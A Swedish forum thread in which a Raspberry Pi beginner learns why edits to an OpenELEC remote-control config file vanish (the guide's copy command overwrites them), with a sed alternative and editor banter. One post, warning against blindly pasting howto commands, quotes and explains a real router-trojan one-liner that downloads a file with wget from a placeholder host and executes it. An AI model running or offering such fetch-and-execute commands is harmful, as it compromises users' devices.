Raspberry Pi Nybörjare försöker ändra en configurationsfil

C, C++, Pascal, Assembly, Raspberry, Java, Matlab, Python, BASIC, SQL, PHP, etc.
Mikang
Inlägg: 44
Blev medlem: 14 december 2013, 20:07:12

Raspberry Pi Nybörjare försöker ändra en configurationsfil

Inlägg av Mikang »

Hej alla.
Är nybörjare när det kommer till Raspberry Pi.
Följer denna guide och det går bra ända tills jag bootar om burken.
När jag öppnar filen efter ombootning är ändingarna borta.


Use PuTTY or similar to log on to your Raspberry Pi, Default user name is root, password openelec

Key in :
cd .config
cp /etc/lirc/lircd.conf.rpi ./lircd.conf
nano lircd.conf
In the nano text editor now find every line that contains KEY_POWER and put the # character at the beginning of each of these lines, there should be 4 lines containing KEY_POWER.
Press ctrl+x to exit, y to confirm, enter to save the file.
Reboot from the OpenElec GUI


Om jag öppnar filen i nano direkt efter att jag har sparat så finns ändringarna där men om jag stänger PuTTY och går in på samma sätt igen är ändringarna borta. Vad är det jag inte förstår??

/Micke A.
X-IL
EF Sponsor
Inlägg: 8271
Blev medlem: 3 december 2008, 07:47:20
Ort: Hallstahammar

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av X-IL »

Det låter som att denna fil då kopieras in i ditt home/.config-directory varje gång du loggar in?

Låter konstigt, men jag vet inte.
Mikang
Inlägg: 44
Blev medlem: 14 december 2013, 20:07:12

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av Mikang »

Tack för svaret.
Försöker klura ut hur jag skall få fler knappar på fjärrkontrollen att funka, men jag klarar ju inte ens av att spara ändringarna :doh:
Som tur är funkar de viktigaste knapparna.

/Micke A.
danielr112
Inlägg: 8051
Blev medlem: 18 januari 2009, 00:48:24
Ort: Alvesta, Småland

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av danielr112 »

Du ändrar ju bara i kopian du tog..

Vid reboot om du kör ovan igen så kopierar du över den filen du nyss editerat

Låt bli att köra cp kommandot vid reboot.

utan kör bara

cd .config
nano lircd.conf


cp kör du bara första gången.
Mikang
Inlägg: 44
Blev medlem: 14 december 2013, 20:07:12

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av Mikang »

Tack.
Var inne på det borde vara något sådant.
Nu när jag fattar det kan jag börja klura på vilka koder knapparna på fjärren skickar.

/Micke A.
X-IL
EF Sponsor
Inlägg: 8271
Blev medlem: 3 december 2008, 07:47:20
Ort: Hallstahammar

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av X-IL »

Haha, Daniel, så är det ju förstås. Tänkte inte på att allt som står där faktiskt inte är klarspråk för alla, samt att jag själv missade en viktig passage i vad Mikang skrev:
och går in på samma sätt igen
The devil is in the details.
Nerre
Inlägg: 26717
Blev medlem: 19 maj 2008, 07:51:04
Ort: Upplands väsby

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av Nerre »

Det där är den stora faran med såna där howtos som bara säger vad man ska skriva. Jag har aldrig förstått hur folk vågar följa sånt, tänk om kommandona installerar en trojan eller skickar dina kreditkortsuppgifter till nån skurk?


Nu kanske nån tror att det krävs många kommandon för att installera en trojan. Så här såg det ut för den trojan som letade sig in i vår router:

Kod: Markera allt

cd /tmp ; rm -f .nttpd ; wget -O .nttpd http://[ip]:[port] ; chmod +x .nttpd ; ./.nttpd
Det där kommandot laddar alltså ner en trojan, döper den till .nttpd och startar den. IP-adress och port kunde variera, de hade en pool av hackade servrar som de distribuerade trojanen via.

Routern hade alltså en säkerhetslucka där man via en viss port kunde skicka en begäran till den att köra ett valfritt kommando, genom att säga åt routern att köra det ovanstående så installerade man en trojan (som tur var försvann den om man bootade om, då den låg i /tmp som är en RAM-disk).

För den som är intresserad finns det mer att läsa här: http://quantumfilament.co/2015/08/17/ch ... he-binary/


Steg för steg:
cd /tmp ;
Byt bibliotek till /tmp

rm -f .nttpd ;
Ta bort eventuell befintlig .nttpd

wget -O .nttpd http:// [ip] :[port] ;
Ladda ner en fil från servern på [ip]:[port] och döp den till .nttpd

chmod +x .nttpd ;
Gör .nttpd exekverbar

./.nttpd
Exekvera den.

Semikolon separerar kommandon.
addeswe
Inlägg: 5
Blev medlem: 14 april 2014, 08:39:11

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av addeswe »

Istället för att öppna nano. Använd detta i samma katalog som lircd.conf. Detta ändrar varje rad som börjar med KEY_POWER och lägger till en # före.

Kod: Markera allt

cd .config
cp /etc/lirc/lircd.conf.rpi ./lircd.conf
sed -i 's/^KEY_POWER/#KEY_POWER/g' lircd.conf
Nerre
Inlägg: 26717
Blev medlem: 19 maj 2008, 07:51:04
Ort: Upplands väsby

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av Nerre »

Jag vet inte om det är bra att rekommendera sed-kommandon till de som inte har rätt kunskaper, ett enda tecken fel kan ge rätt stora konsekvenser:)

Då är en editor i stil med nano betydligt vettigare.
Användarvisningsbild
lillahuset
Gått bort
Inlägg: 13969
Blev medlem: 3 juli 2008, 08:13:14
Ort: Norrköping

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av lillahuset »

Hehe, det är väl med sed som med dd. Man kan bli väldigt ledsen om man har för bråttom. :)
addeswe
Inlägg: 5
Blev medlem: 14 april 2014, 08:39:11

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av addeswe »

Nerre skrev:Jag vet inte om det är bra att rekommendera sed-kommandon till de som inte har rätt kunskaper, ett enda tecken fel kan ge rätt stora konsekvenser:)
Då är en editor i stil med nano betydligt vettigare.
lillahuset skrev:Hehe, det är väl med sed som med dd. Man kan bli väldigt ledsen om man har för bråttom. :)
Håller med er båda att sed kan vara lite vanskligt för en nybörjare. Dock hade Mikang skrivit exakt vad som skulle ändras. Och för att göra det enkelt så är en sed-rad, skriven av någon med goda avsikter, det lättaste sättet att inget ska gå fel.

Sen vilken editor man ska använda kan vi debattera tills vi alla är gråhåriga. Jag får klåda av att använda annat än vi(m) så. :shock:

Och jag hoppas att du inte tar illa upp lillahuset, men ditt inlägg är så strålande att jag mest troligt kommer citera det i framtiden när det blir snack om sed eller dd. :D
Nerre
Inlägg: 26717
Blev medlem: 19 maj 2008, 07:51:04
Ort: Upplands väsby

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av Nerre »

Det kan möjligen vara ganska säkert om nån kopierar och klistrar, jag har dock för många gånger varit med om att nån försöker skriva av ett kommando istället för kopiera och klistra.

Och även vid kopiering så kan det blir fel (att man missar nåt tecken eller får med ett extra).
Användarvisningsbild
lillahuset
Gått bort
Inlägg: 13969
Blev medlem: 3 juli 2008, 08:13:14
Ort: Norrköping

Re: Raspberry Pi Nybörjare försöker ändra en configurationsf

Inlägg av lillahuset »

addeswe: Nej jag tar inte illa upp. MEN, vi suger, Emacs är den enda acceptabla editorn! Skojar bara. Men jag är uppfödd på Emacs (akronym för "Eighteen Megs And Constantly Swapping) så det är lite halvmotigt för mig att använda vi. Men hellre än "Notepad" och "Word". :)
Skriv svar